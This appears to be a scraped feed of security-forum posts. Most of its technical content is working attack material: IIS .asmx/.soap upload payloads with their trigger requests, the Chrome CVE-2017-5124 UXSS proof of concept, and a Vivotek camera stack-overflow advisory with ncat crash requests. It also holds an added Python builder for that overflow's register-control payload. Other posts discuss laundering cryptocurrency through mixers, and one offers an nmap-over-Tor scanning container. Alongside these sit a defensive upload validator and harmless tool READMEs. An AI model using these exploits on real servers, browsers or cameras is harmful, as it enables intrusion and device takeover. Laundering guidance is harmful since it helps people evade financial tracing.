.shtml More detailed information about SSI is written in the post by @ldionmarcil In addition: There are also two other interesting extensions (.asmx and .soap) that could lead to arbitrary code execution. It was discovered in collaboration with Yury Aleinov (@YuryAleinov). Asmx extension If you can upload file with .asmx extension, it can lead to arbitrary code execution. 
For example, we took file with the following content: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; using System.Diagnostics; [WebService(Namespace="")] public class MyClass : WebService { [WebMethod] public string Pwn_Function() { Process.Start("calc.exe"); return "PWNED"; } } Then we sent POST request to the uploaded document: POST /1.asmx HTTP/1.1 Host: localhost Content-Type: application/soap+xml; charset=utf-8 Content-Length: 287 <?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <Pwn_Function/> </soap12:Body> </soap12:Envelope> As the result, IIS executed “calc.exe” Soap extension Contents of uploaded file with .soap extension: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; public class MyClass : MarshalByRefObject { public MyClass() { System.Diagnostics.Process.Start("calc.exe"); } } SOAP request: POST /1.soap HTTP/1.1 Host: localhost Content-Length: 283 Content-Type: text/xml; charset=utf-8 SOAPAction: "/" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <MyFunction /> </soap:Body> </soap:Envelope> Apache (httpd or Tomcat) Extensions with basic vector: .shtml .html.de or .html.xxx (xxx – any characters)* Extensions with XML-based vector: .rdf .xht .xml .xsl .svg .xhtml .svgz * if there are any characters after “.html.” in the extension, Apache will respond with text/html content-type. In addition: Apache returns response without Content-type header on a large number of files with different extensions, which allows an XSS attack, because browser often decides how to handle this page by itself. 
This article includes detailed information about this question. For example, files with the .xbl and .xml extensions are processed similarly in Firefox (if there is no Content-Type header in the response), so there is the possibility of exploiting XSS using the XML-based vector in this browser.

Nginx

Extensions with basic vector: .htm

Extensions with XML-based vector: .svg .xml .svgz

Source: https://mike-n1.github.io/ExtensionsOverview
    1 point
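As an added example that is not part of the article above: a small Python upload validator that shows why the article's title holds. The risky-extension set is copied from the article's IIS, Apache and nginx results; the naive blacklist, the image whitelist and the file names are constructed for this example. A blacklist checks only the final extension, so `.svg`, `.asmx` and the Apache `.html.de` form all slip through, while a whitelist that demands exactly one known extension on a plain name rejects them by construction.

```python
import os
import re

# Extensions the post above found to be served with an XSS-capable Content-Type by
# IIS, Apache or nginx, plus .asmx/.soap which gave code execution on IIS.
# These are exactly the ones a typical blacklist forgets.
RISKY_EXTENSIONS = {
    ".cer", ".hxt", ".htm", ".html", ".shtml", ".shtm", ".stm",
    ".dtd", ".mno", ".vml", ".xsl", ".xslt", ".xht", ".xhtml", ".svg", ".svgz",
    ".xml", ".xsd", ".xsf", ".wsdl", ".rdf", ".xbl",
    ".asmx", ".soap",
}

# A blacklist as developers usually write it (constructed for this example).
NAIVE_BLACKLIST = {".php", ".asp", ".aspx", ".jsp", ".exe", ".html", ".js"}

# Whitelist for an image upload feature (constructed for this example).
IMAGE_WHITELIST = {".png", ".jpg", ".jpeg", ".gif"}

# A plain stem, one dot, one short extension. Nothing else is accepted.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def extension_segments(filename):
    """Every dot-separated segment after the stem, lowercase:
    'page.html.de' -> ['.html', '.de']. Apache's mod_mime looks at each of
    them, so all of them matter, not just the last one."""
    base = os.path.basename(filename).lower()
    return ["." + seg for seg in base.split(".")[1:]]


def blacklist_allows(filename):
    """What a blacklist check usually does: look only at the final extension."""
    _, ext = os.path.splitext(os.path.basename(filename).lower())
    return ext not in NAIVE_BLACKLIST


def whitelist_allows(filename):
    """Accept only a bare name with exactly one extension from the whitelist.
    Path components, dotfiles, control characters and double extensions are
    rejected by the SAFE_NAME pattern before the extension is even looked at."""
    if os.path.basename(filename) != filename or not SAFE_NAME.fullmatch(filename):
        return False
    _, ext = os.path.splitext(filename.lower())
    return ext in IMAGE_WHITELIST


def is_risky(filename):
    """True if any extension segment is one the post showed to be dangerous."""
    return any(seg in RISKY_EXTENSIONS for seg in extension_segments(filename))


def blacklist_misses(filenames):
    """Files the naive blacklist accepts although they are risky and a
    whitelist would reject them: the gap the article is about."""
    return [f for f in filenames
            if blacklist_allows(f) and is_risky(f) and not whitelist_allows(f)]


if __name__ == "__main__":
    uploads = ["avatar.svg", "hello.asmx", "shell.php", "photo.png", "page.html.de"]
    for name in uploads:
        print("%-14s blacklist=%-5s whitelist=%-5s risky=%s" % (
            name, blacklist_allows(name), whitelist_allows(name), is_risky(name)))
    print("missed by blacklist:", blacklist_misses(uploads))
```

The whitelist also rejects `photo.PNG.asmx` and `../photo.png` without any special casing, which is the practical argument for it: the check describes what is allowed instead of trying to enumerate every server-side quirk.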
12. @yoyois @adicode If everything is 100% legal or, better said, 100% transparent and public and everyone knows everything because it's all out in the open, then how do you explain the news posted right here about people who found some bug in BTC and then in ETH worth on the order of billions of dollars, I think (I believe it was billions)? Can't you see from a mile away, if a transaction of $0.001 (in BTC or ETH) is made, from whom and where it goes? Then how come a million dollars or, even more, a billion dollars, isn't visible where it went? So what about this 100% transparency if you can be traced for 10 dollars while those who pulled off a billion-dollar (or let's say even a million-dollar) heist can't be tracked down by anyone? Suddenly there's no transparency, because I don't understand how they managed to "evaporate" that much money? P.S. The articles were posted on RST, I can't find them anymore, but a search should turn them up.
    1 point
13. Well, you should know I've heard plenty. I actually intended to mention mixers, but they too have many problems. A mixer is "good" only if it is "private" and has a large volume of coins and users (hundreds of users). Besides, there are some methods by which mixers become useful. Out of the box, a mixer offers 0 security. One idea for a good mixer is ICOs. There are multi-leveled strategies for laundering money through mixers. But they don't "clean" the money, they only make tracing it harder (they move the evidence from causation to correlation). @QuoVadis well put anyway. Mixers used correctly are close to the "anonymity" discussed in this topic. If you combine mixers with zkSNARKs and some accounting you're close to what I consider "efficient laundering".
    1 point
14. It's a bit off-topic, but @yoyois, seeing how passionately you write, I suspect you haven't heard of bitcoin tumblers / mixers yet? Just because you don't know how to launder bitcoin doesn't mean it isn't possible. Here's some homework for the Christmas holiday, a bit of research
    1 point
15. Let me give you an example:

You create an anonymous online wallet through 3 VPNs (wallet: xvc2).
You buy 1 BTC from the Zebrapay machine in a mall in Bucharest. What does the Zebrapay machine ask you for? The address of wallet xwc2. (So far we know xwc2 is from Bucharest and was at the mall at 13:45; if there are cameras too, it's perfect.)
You pay 0.5 BTC to buy a VPS from which you host a botnet (VPS registered to your email).
You pay 0.2 BTC to buy an SD card from Amazon shipped to your home address.
You pay 0.1 BTC to buy a pretzel from the new digital pretzel shop at the corner of the block. (What the pretzel shop knows about you: that you bought a VPS from a certain company, that you bought a card, how much money you have in your account, how much you had and how much you spent, where and how.)

BTC TRANSACTIONS ARE PUBLIC!!!

If you anger daddy FBI, what can the FBI find out about you: where you loaded BTC from and when (i.e. the country and city), your email and what VPS you have with what content (from the provider), your home address (from Amazon), your name and what you're wearing (from the pretzel shop).

Keep in mind that ABSOLUTELY EVERYTHING you do in BTC is saved and tied to your wallet forever, publicly, accessible to anyone. It's stupidly simple to see who pays whom, when and how. From that you can understand what kind of relationships they have and what they do. If you want to do something illegal and serious with BTC, you'd better give it up.

PS: If someone buys me a beer I'll write a post explaining in detail how I think virtual coins can be laundered. Go ahead with the illegal stuff on the blockchain!
    1 point
16. Drop the nonsense, this isn't for you. You're playing with things you don't understand. As an idea: Bitcoin offers 0 (zero) anonymity. All BTC transactions are public. So, as an idea, if you want to use BTC for any kind of real-world purchase you can be found (relatively easily). If you want anonymity: zkSNARKs in Monero or multi-level money-laundering schemes. (I suspect these are way beyond you.) PS: Whether it asks for your ID card or not, BTC is still public and your wallet will be very easily linked to your physical person. Complete: Bitcoin's blockchain technology assures immutability, decentralization and distribution of all transactions. It DOES NOT assure: anonymity, privacy, security (of private keys), protection against correlation attacks.
    1 point
17. We discussed this at university (I'm in the field) and many complications can arise. The surgeon I talked to said it is possible, but the success rate is low. Every person has certain "mutations", so to speak, at the DNA level. It is assumed that by administering immunosuppressants so the transplant isn't rejected, it's possible to live up to 10-15 years, but that applies to liver, heart transplants, etc. Here we're talking about nerves, neurons, glial cells, which have a much more fragile structure than the ones above. Structural diseases of the nervous system can appear very easily. It's possible, but unlikely to be a success, especially in the long term.
    1 point
18. Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit.

Download CVE-2017-5124-master.zip

Content: PoC.mht, PoC.php, README.md

Mirror:

README.md

    # CVE-2017-5124
    ### UXSS with MHTML
    DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100)

PoC.php

    <?php
    $filename = realpath("PoC.mht");
    header("Content-type: multipart/related");
    readfile($filename);
    ?>

PoC.mht

    MIME-Version: 1.0
    Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--"

    CVE-2017-5124
    ------MultipartBoundary--
    Content-Type: application/xml;

    <?xml version="1.0" encoding="UTF-8"?>
    <?xml-stylesheet type="text/xml" href="#stylesheet"?>
    <!DOCTYPE catalog [
    <!ATTLIST xsl:stylesheet id ID #REQUIRED>
    ]>
    <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="*">
    <html><iframe style="display:none" src="https://google.com"></iframe></html>
    </xsl:template>
    </xsl:stylesheet>
    ------MultipartBoundary--
    Content-Type: text/html
    Content-Location: https://google.com

    <script>alert('Location origin: '+location.origin)</script>
    ------MultipartBoundary----

Source
    1 point
  19. Awesome Coding Videos Learn to code by watching free awesome video courses Source: www.awesomecodingvideos.com
    1 point
20. Many Vivotek IP cameras suffer from a remote stack overflow vulnerability; the affected device models are listed in the advisory below.

[STX]

Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher
Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possibly more
Download Updated Firmware: http://www.vivotek.com/firmware/

[Timeline]

October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked a few release notes, none mention a security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.

[Details]

Vivotek uses a modified version of Boa/0.94.14rc21, and the vulnerability was introduced by Vivotek.

The stack overflow is triggered by a "PUT" or "POST" request:

    [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n

However, the absolutely minimal request that triggers the stack overflow is weird, most probably due to a quick hack:

    "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"

This allows us to insert [JUNK] made of 'good bytes', up to 9182 bytes (0x1FFF) for the whole request:

    "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"

Notes:

1. B to I = $R4-$R11; X = $PC
2. Size of the request is available in $R3 at the LDMFD
3. Max request size: 9182 bytes (0x1FFF)
4. Starting with "\n" in "\n\r\n\r\n" is needed to jump to 0x00xxxxxx (if not, $PC will be 0x0dxxxxxx)
5. The space (0x20) after ':' in 'Content-Length:' counts as one char of the 20 bytes
6. Stack not protected with stack canaries
7. Good bytes: 0x01-0x09, 0x0b-0xff; bad bytes: 0x00, 0x0a
8. heap: Non-executable + Non-ASLR
9. stack: Non-executable + ASLR

[PoC]

    $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80

    (gdb) target remote 192.168.57.20:23946
    Remote debugging using 192.168.57.20:23946
    0x76eb2c5c in ?? ()
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x58585858 in ?? ()
    (gdb) bt
    #0  0x58585858 in ?? ()
    #1  0x000188f4 in ?? ()
    Backtrace stopped: previous frame identical to this frame (corrupt stack?)
    (gdb) i reg
    r0             0x1      1
    r1             0x47210  291344
    r2             0x0      0
    r3             0x75     117
    r4             0x42424242       1111638594
    r5             0x43434343       1128481603
    r6             0x44444444       1145324612
    r7             0x45454545       1162167621
    r8             0x46464646       1179010630
    r9             0x47474747       1195853639
    r10            0x48484848       1212696648
    r11            0x49494949       1229539657
    r12            0x1      1
    sp             0x7e92dac0       0x7e92dac0
    lr             0x188f4  100596
    pc             0x58585858       0x58585858
    cpsr           0x60000010       1610612752
    (gdb)

    $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80

    (gdb) target remote 192.168.57.20:23946
    Remote debugging using 192.168.57.20:23946
    0x76e82c5c in ?? ()
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x58585858 in ?? ()
    (gdb) bt
    #0  0x58585858 in ?? ()
    #1  0x000188f4 in ?? ()
    Backtrace stopped: previous frame identical to this frame (corrupt stack?)
    (gdb) i reg
    r0             0x1      1
    r1             0x47210  291344
    r2             0x0      0
    r3             0x4f     79
    r4             0x42424242       1111638594
    r5             0x43434343       1128481603
    r6             0x44444444       1145324612
    r7             0x45454545       1162167621
    r8             0x46464646       1179010630
    r9             0x47474747       1195853639
    r10            0x48484848       1212696648
    r11            0x49494949       1229539657
    r12            0x1      1
    sp             0x7ec9cac0       0x7ec9cac0
    lr             0x188f4  100596
    pc             0x58585858       0x58585858
    cpsr           0x60000010       1610612752
    (gdb)

Have a nice day
/bashis

[ETX]

Source
    1 point
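An added example, not part of bashis' advisory or PoC repository: a Python builder for the request layout given in [Details] that enforces the constraints from the Notes (register order R4..R11 then PC, the 20 garbage bytes, the 0x00/0x0a bad bytes, the 0x1FFF size limit, the "\n\r\n\r\n" terminator), plus a triage helper that maps register values from a gdb `i reg` dump back to offsets in the request that was sent. It only assembles bytes and never talks to a device. The three-byte handling of a $PC whose top byte is 0x00 is my reading of note 4, and the function names, default register filler and junk handling are assumptions.

```python
import struct

# Constraints as stated in the advisory's Notes.
BAD_BYTES = {0x00, 0x0A}                  # note 7
MAX_REQUEST = 0x1FFF                      # note 3 (0x1FFF is 8191 bytes)
GARBAGE_LEN = 20                          # bytes between "Content-Length:" and $R4 (note 5)
TERMINATOR = b"\n\r\n\r\n"                # note 4
REGISTER_ORDER = ("r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11")  # note 1, then $PC


def has_bad_bytes(data):
    return any(b in BAD_BYTES for b in data)


def build_request(regs, pc, method=b"POST",
                  request_line=b" /cgi-bin/admin/upgrade.cgi HTTP/1.0\n",
                  junk=b"", garbage=b"A" * GARBAGE_LEN):
    """Assemble the overflow request from [Details]:

        [METHOD][request line][JUNK]Content-Length[JUNK]:[20 garbage][R4..R11][PC]\\n\\r\\n\\r\\n

    regs maps 'r4'..'r11' to 32-bit values (little-endian ARM); registers not
    given are filled with 0x41414141. Pass request_line=b"" for the minimal
    "PUTContent-Length:..." form from the advisory. If the top byte of pc is
    0x00 only three bytes are emitted and the leading "\\n" of the terminator
    is relied on to end up as that 0x00 (my reading of note 4, an assumption).
    Raises ValueError when a controlled chunk contains a bad byte or the whole
    request exceeds the size limit."""
    if len(garbage) != GARBAGE_LEN:
        raise ValueError("garbage must be exactly %d bytes" % GARBAGE_LEN)
    reg_bytes = b"".join(struct.pack("<I", regs.get(n, 0x41414141)) for n in REGISTER_ORDER)
    pc_bytes = struct.pack("<I", pc)
    if pc_bytes[3] == 0:
        pc_bytes = pc_bytes[:3]
    for label, chunk in (("junk", junk), ("garbage", garbage),
                         ("registers", reg_bytes), ("pc", pc_bytes)):
        if has_bad_bytes(chunk):
            raise ValueError("%s contains a bad byte (0x00 or 0x0a)" % label)
    req = (method + request_line + junk + b"Content-Length" + junk + b":"
           + garbage + reg_bytes + pc_bytes + TERMINATOR)
    if len(req) > MAX_REQUEST:
        raise ValueError("request is %d bytes, limit is %d" % (len(req), MAX_REQUEST))
    return req


def controlled_registers(crash_regs, request):
    """Map register values from a gdb 'i reg' dump back to offsets in the request
    we sent. A register is reported only if its little-endian bytes occur in the
    request, i.e. we control it; $R3 (the request size, note 2) will not match."""
    found = {}
    for name, value in crash_regs.items():
        idx = request.find(struct.pack("<I", value & 0xFFFFFFFF))
        if idx != -1:
            found[name] = idx
    return found


if __name__ == "__main__":
    # Reproduce the advisory's marker pattern: BBBB..IIII in R4..R11, XXXX in PC.
    markers = {n: int.from_bytes((c * 4).encode(), "little")
               for n, c in zip(REGISTER_ORDER, "BCDEFGHI")}
    req = build_request(markers, 0x58585858)
    print(req)
    # Values taken from the first gdb dump in the advisory.
    crash = {"r3": 0x75, "r4": 0x42424242, "r11": 0x49494949, "pc": 0x58585858}
    print(controlled_registers(crash, req))
```

Running it prints the exact request from the first PoC and reports r4 at offset 76, r11 at 104 and pc at 108, with r3 absent because its value is the request size rather than something we wrote.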
21. If this is Black Friday, I'm a priest. Shameful. What prices they have for a country like Romania. Thanks for posting.
    1 point
22. weather

Weather via the command line. Uses the darksky.net API so it's super accurate. Also includes any current weather alerts in the output.

Installation

Binaries

    darwin  386 / amd64
    freebsd 386 / amd64
    linux   386 / amd64 / arm / arm64
    solaris amd64
    windows 386 / amd64

Via Go

    $ go get github.com/jessfraz/weather

Usage

--location, -l: Your address, can be in the format of just a zipcode or a city, state, or the full address. Defaults to auto locating you based off your IP.
--units, -u: The unit system to use. Defaults to auto; other options are us, si, uk, uk2, ca. For more information on units see the darksky.net API.
--days, -d: Days of weather to retrieve. Defaults to the current weather, i.e. 0 or 1.
--ignore-alerts: Don't print alerts in weather output. Defaults to false.
--hide-icon: Hide the weather icons from being output. Defaults to false.
--server, -s: Weather API server URI. Defaults to "https://geocode.jessfraz.com".

Examples

    # get the current weather in your current location
    $ weather

    # change the units to metric
    $ weather -l "Paris, France" -u si

    # it will auto guess the units though so changing
    # the location to paris will change the units to `si`
    $ weather -l "Paris, France"

    # get three days forecast for NY
    $ weather -l 10028 -d 3

    # or you can autolocate and get three days forecast
    $ weather -d 3

    # get the weather in Manhattan Beach, CA
    # even includes alerts
    $ weather -l "Manhattan Beach, CA"
    #
    #   (ASCII-art "partly cloudy" icon printed here)
    #
    # Current weather is Partly Cloudy in Manhattan Beach in California for July 14 at 4:14am EDT
    # The temperature is 69.2°F, but it feels like 69.2°F
    #
    # Special Weather Statement for Los Angeles, CA
    # ...THREAT OF MONSOONAL THUNDERSTORMS LATE TONIGHT THROUGH WEDNESDAY...
    # A STRONG UPPER LEVEL HIGH PRESSURE SYSTEM CURRENTLY CENTERED OVER NEVADA
    # WILL BRING INCREASING EAST TO SOUTHEAST FLOW OVER SOUTHERN
    # CALIFORNIA. AS A RESULT...A SIGNIFICANT SURGE OF MONSOONAL MOISTURE
    # WILL MOVE INTO SOUTHWEST CALIFORNIA LATE TONIGHT THROUGH WEDNESDAY.
    # THE GREATEST THREAT OF SHOWERS AND THUNDERSTORMS WILL BE ACROSS THE
    # MOUNTAINS AND ANTELOPE VALLEY LATE TONIGHT INTO TUESDAY. DUE TO THE
    # EASTERLY UPPER LEVEL FLOW ON MONDAY...THERE WILL ALSO BE A SLIGHT
    # CHANCE OF SHOWERS AND THUNDERSTORMS ACROSS MOST COASTAL AND VALLEY
    # AREAS.
    # THE DEEPER MONSOONAL MOISTURE WILL BRING THE POTENTIAL FOR BRIEF HEAVY
    # RAINFALL WITH STORMS THAT DEVELOP ON MONDAY AND TUESDAY...ESPECIALLY
    # ACROSS THE MOUNTAINS AND ANTELOPE VALLEY. WHILE STORMS ARE EXPECTED
    # TO BE FAST MOVING...THERE WILL BE THE POTENTIAL FOR LOCALIZED FLOODING
    # OF ROADWAYS AND ARROYOS. ON TUESDAY...THE THREAT OF THUNDERSTORMS IS
    # EXPECTED TO REMAIN CONFINED TO THE MOUNTAINS AND DESERTS. WITH WEAKER
    # UPPER LEVEL WINDS ON TUESDAY...STORMS WILL LIKELY MOVE SLOWER. AS A
    # RESULT...THERE WILL BE AN INCREASED THREAT OF FLASH FLOODING.
    # IT WILL NOT BE AS HOT ACROSS MUCH OF THE REGION TOMORROW DUE TO THE
    # INCREASED MOISTURE AND CLOUD COVERAGE...WITH INTERIOR SECTIONS
    # GENERALLY REMAINING IN THE 90S. HOWEVER...THERE WILL BE A
    # SIGNIFICANT INCREASE IN HUMIDITY ON MONDAY THAT WILL CONTINUE TO
    # BRING DISCOMFORT.
    # ANYONE PLANNING OUTDOOR ACTIVITIES IN THE MOUNTAINS AND DESERTS
    # DURING THE NEXT FEW DAYS SHOULD CAREFULLY MONITOR THE LATEST
    # NATIONAL WEATHER SERVICE FORECASTS AND STATEMENTS DUE TO THE
    # POTENTIAL HAZARDS ASSOCIATED WITH THUNDERSTORMS.
    # Created: July 13 at 10:50pm EDT
    # Expires: July 14 at 7:00pm EDT
    #
    # Ick! The humidity is 85%
    # The nearest storm is 18 miles NE away
    # The wind speed is 3.96 mph SE
    # The cloud coverage is 35%
    # The visibility is 9.58 miles
    # The pressure is 1012.99 mbar

Makefile Usage

    $ make help
    all                  Runs a clean, build, fmt, lint, test, vet and install
    build                Builds a dynamic executable or package
    clean                Cleanup any build binaries or packages
    cross                Builds the cross compiled binaries, creating a clean directory structure (eg. GOOS/GOARCH/binary)
    fmt                  Verifies all files have been `gofmt`ed
    install              Installs the executable or package
    lint                 Verifies `golint` passes
    release              Builds the cross compiled binaries, naming them in such a way for release (eg. binary-GOOS-GOARCH)
    tag                  Create a new git tag to prepare to build a release
    test                 Runs the go tests
    vet                  Verifies `go vet` passes

Download weather-master.zip

Source
    1 point
  23. Step aside python \o/. Meanwhile, curl wttr.in/Tokyo
    1 point
24. Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container.

docker-onion-nmap

Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050.

Tor is also configured via DNSPort to anonymously resolve DNS requests on port 9053. dnsmasq is configured with localhost:9053 as an authoritative DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests go through Tor and applications can resolve .onion addresses.

Example:

    $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
    [tor_wait] Wait for Tor to boot... (might take a while)
    [tor_wait] Done. Tor booted.
    [nmap onion] nmap -p 80,443 facebookcorewwwi.onion
    [proxychains] config file found: /etc/proxychains.conf
    [proxychains] preloading /usr/lib/libproxychains4.so
    [proxychains] DLL init: proxychains-ng 4.12

    Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
    [proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
    [proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
    Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
    Host is up (2.7s latency).

    PORT    STATE SERVICE
    80/tcp  open  http
    443/tcp open  https

    Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds

How it works:

When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:

By default, args to docker run are passed to /bin/nmap, which calls nmap with the args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).

For example, this:

    docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion

will be executed as:

    proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion

In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:

    docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion

will be executed as:

    proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion

and

    docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion

will be executed as:

    proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion

If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl, you can specify it as the first argument to docker run, e.g.:

    docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:

There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted connections to Tor while waiting for it to boot). Example:

    $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
    [tor_wait] Wait for Tor to boot... (might take a while)
    [tor_wait retry 0] Check socket is open on localhost:9050...
    [tor_wait retry 0] Socket OPEN on localhost:9050
    [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
    [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
    [tor_wait retry 1] Check socket is open on localhost:9050...
    [tor_wait retry 1] Socket OPEN on localhost:9050
    [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
    [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
    [tor_wait retry 2] Check socket is open on localhost:9050...
    [tor_wait retry 2] Socket OPEN on localhost:9050
    [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
    [tor_wait retry 2] SOCKS proxy UP on localhost:9050
    [tor_wait] Done. Tor booted.
    [nmap onion] nmap -p 80,443 facebookcorewwwi.onion
    [proxychains] config file found: /etc/proxychains.conf
    [proxychains] preloading /usr/lib/libproxychains4.so
    [proxychains] DLL init: proxychains-ng 4.12

    Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
    [proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
    [proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
    Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
    Host is up (2.8s latency).

    PORT    STATE SERVICE
    80/tcp  open  http
    443/tcp open  https

    Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

Notes:

- No UDP available over Tor.
- Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap.

gr33tz

- @jessfraz tor-proxy
- @zuazo alpine-tor-docker
- shellhacks
- crypto-rebels.de

Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git

Source
    1 point
25. What is MHA:

Mail header analyzer is a tool written in Flask for parsing email headers and converting them to a human readable format. It also can:

- Identify hop delays.
- Identify the source of the email.
- Identify hop country.

MHA is an alternative for the following:

    Name                     Dev        Issues
    MessageHeader            Google     Not showing all the hops.
    EmailHeaders             Mxtoolbox  Not accurate and slow.
    Message Header Analyzer  Microsoft  Broken UI.

Installation:

Install system dependencies:

    sudo apt-get update
    sudo apt-get install python-pip
    sudo pip install virtualenv

Create a Python virtual environment and activate it:

    virtualenv virt
    source virt/bin/activate

Clone the GitHub repo:

    git clone https://github.com/lnxg33k/MHA.git

Install Python dependencies:

    cd MHA
    pip install -r requirements.txt

Run the development server:

    python server.py -d

You can change the bind address or port by specifying the appropriate options:

    python server.py -b 0.0.0.0 -p 8080

Everything should go well; now visit: http://localhost:8080

Docker

A Dockerfile is provided if you wish to build a docker image.

    docker build -t mha:latest .

You can then run a container with:

    docker run -d -p 8080:8080 mha:latest

Download MHA-master.zip

Source: https://github.com/lnxg33k/MHA
    1 point
